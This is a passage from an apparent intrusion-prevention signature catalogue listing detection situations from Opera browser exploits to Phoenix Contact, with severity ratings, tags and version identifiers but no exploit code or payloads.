Tags: Any Operating System, Any Hardware, Opera, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Opera-Browser-Document-Writing-Uninitialized-Memory-Access
Description:
Back to top

File-Text_Opera-Browser-File-URI-Handling-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in Opera browser detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Opera, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Opera-Browser-File-URI-Handling-Buffer-Overflow
Description:
Back to top

File-Text_Opera-History-Search-Cross-Site-Scripting

About this situation: An attempt to exploit an Opera History Search Cross-Site Scripting detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Opera, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-764-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Opera-History-Search-Cross-Site-Scripting
Description:
Back to top

File-Text_Opera-JavaScript-Alert-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Opera detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Opera, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-587-5211
Description:
Back to top

File-Text_Opera-Suspicious-Preference-Modification

About this situation: Detected an attempt to modify Opera preferences in a suspicious way from a script
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Opera, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Opera-Preferences-Modification
Description:
Back to top

File-Text_Oracle-AutoVue-ActiveX-Control-SetMarkupMode-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle AutoVue detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle AutoVue, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-461-5211
Last changed: sgpkg-ips-461-5211
Vulnerability: Oracle-AutoVue-ActiveX-Control-SetMarkupMode-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Oracle-AutoVue-ActiveX-Export3DBom-Remote-File-Creation

About this situation: An attempt to exploit a vulnerability in Oracle AutoVue detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle AutoVue, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-421-4219
Vulnerability: Oracle-AutoVue-ActiveX-Export3DBom-Remote-File-Creation
Description:
Back to top

File-Text_Oracle-AutoVue-ActiveX-ExportEdaBom-Remote-File-Creation

About this situation: An attempt to exploit a vulnerability in Oracle AutoVue detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle AutoVue, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-925-5242
Vulnerability: Oracle-AutoVue-ActiveX-ExportEdaBom-Remote-File-Creation
Description:
Back to top

File-Text_Oracle-AutoVue-ActiveX-SaveViewStateToFile-Remote-File-Creation

About this situation: An attempt to exploit a vulnerability in Oracle AutoVue detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle AutoVue, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-421-4219
Vulnerability: Oracle-AutoVue-ActiveX-SaveViewStateToFile-Remote-File-Creation
Description:
Back to top

File-Text_Oracle-Business-Intelligence-External-Entity-Injection-CVE-2019-2616

About this situation: An attempt to exploit a vulnerability in Oracle Business Intelligence detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Business Intelligence Enterprise Edition, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1668-5242
Last changed: sgpkg-ips-1753-5242
Vulnerability: Oracle-Business-Intelligence-External-Entity-Injection-CVE-2019-2616
Description:
Back to top

File-Text_Oracle-Data-Control-ORADC-ActiveX-Control-Code-Execution

About this situation: An attempt to exploit a vulnerability in Oracle ORADC ActiveX control detected
Context: Text File Stream
Severity: 7
Tags: Windows, x86, Oracle 8i, Oracle 9i, Oracle 10g, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: HTTP-Oracle-Data-Control-ORADC-ActiveX-Control-Code-Execution
Description:
Back to top

File-Text_Oracle-Data-Quality-Datetimewrapper-Onchange-Untrusted-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Oracle Data Profiling and Data Quality for Data Integrator detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Data Profiling and Data Quality for Data Integrator, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-590-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: Oracle-Data-Quality-Datetimewrapper-Onchange-Untrusted-Pointer-Dereference
Description:
Back to top

File-Text_Oracle-Data-Quality-Dscxb-Onloadstatechange-Untrusted-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Oracle Data Profiling and Data Quality for Data Integrator detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Data Profiling and Data Quality for Data Integrator, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-593-5211
Last changed: sgpkg-ips-593-5211
Vulnerability: Oracle-Data-Quality-Dscxb-Onloadstatechange-Untrusted-Pointer-Dereference
Description:
Back to top

File-Text_Oracle-Data-Quality-Filechooserdlg-Onchangedirectory-Untrusted-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Oracle Data Profiling and Data Quality for Data Integrator detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Data Profiling and Data Quality for Data Integrator, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-715-5211
Vulnerability: Oracle-Data-Quality-Filechooserdlg-Onchangedirectory-Untrusted-Pointer-Deref
Description:
Back to top

File-Text_Oracle-Data-Quality-Loaderwizard-Multiple-Type-Confusion-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Oracle Data Profiling and Data Quality for Data Integrator detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Data Profiling and Data Quality for Data Integrator, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-636-5211
Vulnerability: Oracle-Data-Quality-Loaderwizard-Datapreview-Type-Confusion
Oracle-Data-Quality-Trillium-Based-Setbasicpreviewdata-Type-Confusion
Oracle-Data-Quality-Trillium-Based-Setentities-Type-Confusion
Description:
Back to top

File-Text_Oracle-Data-Quality-Postcardpreviewint-Onclose-Untrusted-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Oracle Data Profiling and Data Quality for Data Integrator detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Data Profiling and Data Quality for Data Integrator, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: Oracle-Data-Quality-Postcardpreviewint-Onclose-Untrusted-Pointer-Dereference
Description:
Back to top

File-Text_Oracle-Document-Capture-ActiveX-Control-SetAnnotationFont-Usage

About this situation: Usage of a vulnerable ActiveX Control method detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Document Capture, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-527-5211
Last changed: sgpkg-ips-551-5211
Vulnerability: Oracle-Document-Capture-ActiveX-Control-SetAnnotationFont-Buffer-Overflow
Description:
Back to top

File-Text_Oracle-Document-Capture-ActiveX-Control-WriteJPG-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Document Capture detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Oracle Document Capture, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-574-5211
Vulnerability: Oracle-Document-Capture-ActiveX-Control-WriteJPG-Buffer-Overflow
Description:
Back to top

File-Text_Oracle-Document-Capture-EasyMail-ActiveX-Control

About this situation: An attempt to exploit a vulnerability in Oracle Document Capture detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Document Capture, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-570-5211
Vulnerability: Oracle-Document-Capture-EasyMail-ActiveX-Control
Description:
Back to top

File-Text_Oracle-Document-Capture-EasyMail-IMAP4-LicenseKey-BOF-Exploit

About this situation: An exploit against a buffer overflow vulnerability in Oracle Document Capture integrated with Oracle Imaging and Process Management and Oracle Universal Content Management products detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Oracle Document Capture, QuikSoft Corp EasyMail, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-637-5211
Vulnerability: Oracle-Document-Capture-EasyMail-IMAP4-LicenseKey-Buffer-Overflow
Description:
Back to top

File-Text_Oracle-Document-Capture-EasyMail-IMAP4-LicenseKey-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Oracle Document Capture integrated with the Oracle Imaging and Process Management and Oracle Universal Content Management products detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Oracle Document Capture, QuikSoft Corp EasyMail, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-455-5211
Vulnerability: Oracle-Document-Capture-EasyMail-IMAP4-LicenseKey-Buffer-Overflow
Description:
Back to top

File-Text_Oracle-Document-Capture-EasyMail-SMTP-Addattachment-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Document Capture detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Oracle Imaging and Process Management, Oracle Document Capture, Oracle Universal Content Management, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-552-5211
Vulnerability: Oracle-Document-Capture-EasyMail-SMTP-Addattachment-Buffer-Overflow
Description:
Back to top

File-Text_Oracle-Document-Capture-EasyMail-SMTP-SubmitToExpress-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Document Capture detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Oracle Document Capture, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-456-5211
Vulnerability: Oracle-Document-Capture-EasyMail-SMTP-SubmitToExpress-Buffer-Overflow
Description:
Back to top

File-Text_Oracle-Hyperion-Strategic-Finance-Client-TTF16-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Hyperion Strategic Finance Client detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Hyperion Strategic Finance Client, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-425-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: Oracle-Hyperion-Strategic-Finance-Client-TTF16-Heap-Buffer-Overflow
Description:
Back to top

File-Text_Oracle-Java-CVE-2019-2449-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in Oracle Java SE detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java SE, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1148-5242
Last changed: sgpkg-ips-1697-5242
Vulnerability: Oracle-Java-CVE-2019-2449-Arbitrary-File-Deletion
Description:
Back to top

File-Text_Oracle-Java-Ie-Browser-Plugin-Docbase-Parameter-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Java Runtime Environment (JRE) detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle SDK for Solaris, Oracle Java Development Kit, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-576-5211
Vulnerability: Oracle-Java-Ie-Browser-Plugin-Docbase-Parameter-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Oracle-Java-Security-Slider-Feature-Bypass

About this situation: An attempt to exploit a vulnerability in Oracle Java Runtime Environment (JRE) detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, CVE2013, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-513-5211
Last changed: sgpkg-ips-513-5211
Vulnerability: Oracle-Java-Security-Slider-Feature-Bypass
Description:
Back to top

File-Text_Oracle-Java-Web-Start-ActiveX-Control-LaunchApp-Memory-Access-Error

About this situation: An attempt to exploit a vulnerability in Oracle Java Development Kit (JDK) detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-522-5211
Vulnerability: Oracle-Java-Web-Start-ActiveX-Control-LaunchApp-Memory-Access-Error
Description:
Back to top

File-Text_Oracle-Java-Web-Start-ActiveX-Control-Vulnerable-Method-Usage

About this situation: Usage of a vulnerable ActiveX control method detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, CVE2013, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: Oracle-Java-Web-Start-ActiveX-Control-LaunchApp-Memory-Access-Error
Description:
Back to top

File-Text_Oracle-Webcenter-Content-Checkoutandopen.dll-ActiveX-Code-Execution

About this situation: An attempt to exploit a vulnerability in Oracle WebCenter Content detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebCenter Content, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-536-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: Oracle-Webcenter-Content-Checkoutandopen.dll-ActiveX-Control-Code-Execution
Description:
Back to top

File-Text_Oracle-Webcenter-Forms-Recognition-ActiveX-File-Creation

About this situation: An attempt to exploit a vulnerability in Oracle WebCenter Forms Recognition detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebCenter Forms Recognition, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-630-5211
Vulnerability: Oracle-Webcenter-Forms-Recognition-ActiveX-Control-Arbitrary-File-Creation
Description:
Back to top

File-Text_Oracle-Webcenter-Forms-Recognition-Sssplt30.ocx-ActiveX-Vulnerability

About this situation: An attempt to exploit a vulnerability in Oracle WebCenter Forms Recognition detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle WebCenter Forms Recognition, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-563-5211
Vulnerability: Oracle-Webcenter-Forms-Recognition-Sssplt30.ocx-ActiveX-Vulnerability
Description:
Back to top

File-Text_Oracle-WebLogic-Server-Web-Service-Config-Arbitrary-File-Upload

About this situation: A vulnerability in Oracle WebLogic Server
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2018, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1091-5242
Last changed: sgpkg-ips-1091-5242
Vulnerability: Oracle-WebLogic-Server-Web-Service-Config-Arbitrary-File-Upload
Description:
Back to top

File-Text_Orbit-Downloader-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a stack based buffer overflow vulnerability in Orbit Downloader.
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Orbit Downloader, CVE2009, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-665-5211
Vulnerability: Orbit-Downloader-Stack-Based-Buffer-Overflow
Description:
Back to top

File-Text_Ourgame-GlobalLink-GLChat-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Ourgame GlobalLink detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Ourgame GlobalLink, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: Ourgame-GlobalLink-GLChat-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Ourworld-GLWorld-ActiveX-Component-Buffer-Overflow

About this situation: Detected an attempt to exploit a vulnerability in Ourworld GLWorld ActiveX component
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Ourworld GLWorld, CVE2008, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-552-5211
Vulnerability: Ourworld-GLWorld-ActiveX-Component-Buffer-Overflow
Description:
Back to top

File-Text_Outdated-Browser-Accessing-ActiveX-Object-In-HTML

About this situation: An outdated browser version detected accessing an ActiveX object
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1774-5242
Last changed: sgpkg-ips-1774-5242
Description:
Back to top

File-Text_Outdated-Browser-VBScript-Scripting-Detected

About this situation: Outdated browser accessing VBScript detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1771-5242
Last changed: sgpkg-ips-1771-5242
Vulnerability: VBScript-Scripting-Detected
Description:
Back to top

File-Text_PAC-Resolver-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in PAC resolver Remote Code Execution detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1391-5242
Vulnerability: PAC-Resolver-Remote-Code-Execution
Description:
Back to top

File-Text_Panasonic-Security-API-SDK-Getinfostring-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Panasonic Security API SDK detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Panasonic Security API SDK, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-660-5211
Last changed: sgpkg-ips-660-5211
Vulnerability: Panasonic-Security-API-SDK-Getinfostring-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Panasonic-Security-API-SDK-Iprosapi-ActiveX-Control-Filepassword-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Panasonic Security API SDK detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Panasonic Security API SDK, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-659-5211
Last changed: sgpkg-ips-659-5211
Vulnerability: Panasonic-Security-API-SDK-Iprosapi-ActiveX-Control-Filepassword-Buffer-Overflow
Description:
Back to top

File-Text_Panasonic-Security-API-SDK-Multicastaddr-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Panasonic Security API SDK detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Panasonic Security API SDK, CVE2015, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-662-5211
Last changed: sgpkg-ips-662-5211
Vulnerability: Panasonic-Security-API-SDK-Multicastaddr-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Panic-Transmit-Ftps-Url-Handler-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Panic Trasmit FTP client detected
Context: Text File Stream
Severity: 7
Tags: Mac OS X, Any Hardware, Panic Trasmit, CVE2007, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP-Panic-Transmit-Ftps-Url-Handler-Heap-Buffer-Overflow
Description:
Back to top

File-Text_Parse-Server-Databasecontroller-Prototype-Pollution

About this situation: An attempt to exploit a vulnerability in Parse Server detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Parse Server, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1457-5242
Last changed: sgpkg-ips-1457-5242
Vulnerability: Parse-Server-Databasecontroller-Prototype-Pollution
Description:
Back to top

File-Text_Parse-Server-Transformupdate-Prototype-Pollution-CVE-2022-39396

About this situation: An attempt to exploit a vulnerability in Parse Server detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Parse Server, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1728-5242
Vulnerability: Parse-Server-Transformupdate-Prototype-Pollution-CVE-2022-39396
Description:
Back to top

File-Text_Pastebin-File-Potentially-Containing-Malware-C2-Address

About this situation: A suspicious pastebin file access detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Suspected Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1852-5242
Last changed: sgpkg-ips-1852-5242
Vulnerability: Pastebin-File-Potentially-Containing-Malware-C2-Address
Description:
Back to top

File-Text_PBot-Malware

About this situation: Shellbot malware detected
Context: Text File Stream
Severity: 7
Tags: Unix, Any Hardware, Any Software, Unix not specific, Any Software not specific, Spyware, Malware and Adware
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: PBot-Malware
Description:
Back to top

File-Text_PcVue-SCADA-ActiveX-Control-Insecure-Method-AddPage

About this situation: Insecure method usage detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PcVue, CVE2011, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-568-5211
Vulnerability: PcVue-SCADA-SVUIGrd.ocx-ActiveX-Control-Multiple-Buffer-Overflow-Vulnerabilities
Description:
Back to top

File-Text_PcVue-SCADA-ActiveX-Control-Insecure-Method-DeletePage

About this situation: Insecure method usage detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PcVue, CVE2011, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-568-5211
Vulnerability: PcVue-SCADA-SVUIGrd.ocx-ActiveX-Control-Multiple-Buffer-Overflow-Vulnerabilities
Description:
Back to top

File-Text_PcVue-SCADA-ActiveX-Control-Insecure-Method-GetExtendedColor

About this situation: Insecure method usage detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PcVue, CVE2011, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-568-5211
Vulnerability: PcVue-SCADA-SVUIGrd.ocx-ActiveX-Control-Multiple-Buffer-Overflow-Vulnerabilities
Description:
Back to top

File-Text_PcVue-SCADA-ActiveX-Control-Insecure-Method-LoadObject

About this situation: Insecure method usage detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PcVue, CVE2011, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-568-5211
Vulnerability: PcVue-SCADA-SVUIGrd.ocx-ActiveX-Control-Multiple-Buffer-Overflow-Vulnerabilities
Description:
Back to top

File-Text_PcVue-SCADA-ActiveX-Control-Insecure-Method-SaveObject

About this situation: Insecure method usage detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PcVue, CVE2011, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-568-5211
Vulnerability: PcVue-SCADA-SVUIGrd.ocx-ActiveX-Control-Multiple-Buffer-Overflow-Vulnerabilities
Description:
Back to top

File-Text_Perl-Obfuscator-Code

About this situation: Possible obfuscated Perl code detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-767-5211
Last changed: sgpkg-ips-767-5211
Vulnerability: Perl-Obfuscator-Code
Description:
Back to top

File-Text_Persits-Xupload-ActiveX-Buffer-Overflow

About this situation: An attempt exploit a Persits Xupload ActiveX Buffer Overflow vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Persits XUpload, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-732-5211
Last changed: sgpkg-ips-732-5211
Vulnerability: Persits-Xupload-ActiveX-Buffer-Overflow
Description:
Back to top

File-Text_PGP-Private-Key-File

About this situation: A private PGP key file was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PGP, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-489-5211
Last changed: sgpkg-ips-489-5211
Vulnerability: PGP-Key-File
Description:
Back to top

File-Text_PGP-Public-Key-File

About this situation: A public PGP key file was detected
Context: Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, PGP, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-489-5211
Last changed: sgpkg-ips-489-5211
Vulnerability: PGP-Key-File
Description:
Back to top

File-Text_Phishing-Script_Detected

About this situation: User credential stealer detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1378-5242
Last changed: sgpkg-ips-1378-5242
Vulnerability: Phishing-Script_Detected
Description:
Back to top

File-Text_Phishing-Script_Detected_2

About this situation: User credential stealer detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1383-5242
Last changed: sgpkg-ips-1383-5242
Vulnerability: Phishing-Script_Detected
Description:
Back to top

File-Text_Phishing-Template-Detected-1

About this situation: User credential stealer detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1253-5242
Vulnerability: Phishing-Template-Detected
Description:
Back to top

File-Text_Phishing-Template-Detected-2

About this situation: User credential stealer detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1258-5242
Last changed: sgpkg-ips-1258-5242
Vulnerability: Phishing-Template-Detected
Description:
Back to top

File-Text_Phishing-Template-Detected-3

About this situation: User credential stealer detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1258-5242
Last changed: sgpkg-ips-1258-5242
Vulnerability: Phishing-Template-Detected
Description:
Back to top

File-Text_Phishing-Template-Detected-4

About this situation: User credential stealer detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1258-5242
Last changed: sgpkg-ips-1258-5242
Vulnerability: Phishing-Template-Detected
Description:
Back to top

File-Text_Phishing-Template-Detected-5

About this situation: User credential stealer detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1259-5242
Last changed: sgpkg-ips-1265-5242
Vulnerability: Phishing-Template-Detected
Description:
Back to top

File-Text_Phoenix-Contact-Automationworx-Plcopen-Xml-Stack-Buffer-Overflow

